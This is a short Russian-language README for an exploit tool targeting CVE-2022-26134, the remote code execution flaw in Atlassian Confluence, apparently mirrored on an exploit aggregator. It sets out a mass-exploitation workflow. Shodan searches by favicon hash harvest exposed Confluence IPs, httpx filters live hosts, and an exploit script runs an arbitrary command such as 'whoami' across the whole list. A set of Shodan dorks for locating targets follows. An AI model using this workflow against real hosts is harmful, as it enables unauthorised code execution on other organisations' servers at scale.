## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ABHISHEKMORLA-CVE-2022-26134
# CVE-2022-26134
1. Сначала запустите скрипты shodan, чтобы получить все IP-адреса
`python3 shodan_script.py -API your_api -L limit -D "http.favicon.hash:-305179312 200" > log.txt`
`ex: python3 shodan_script.py -API xxxxxxx -L 10 -D "http.favicon.hash:-305179312 200" > log.txt`
2. Для всех валидных IP-адресов:
`cat log.txt | httpx -o forexploits.txt`
3. Запустите эксплойт против списка "forexploits.txt":
`python3 CVE-2022-26134.py forexploits.txt "whoami"`
что выводит IP-адрес и команду для уязвимых хостов.
# Shodan_Dorks для CVE-2022-26134
`http.component:"atlassian confluence"`
`http.favicon.hash:-305179312"`
`http.title:"Log In - Confluence" 200`
`http.component:"atlassian confluence" http.title:"Log In - Confluence" 200`
`http.favicon.hash:-305179312 200`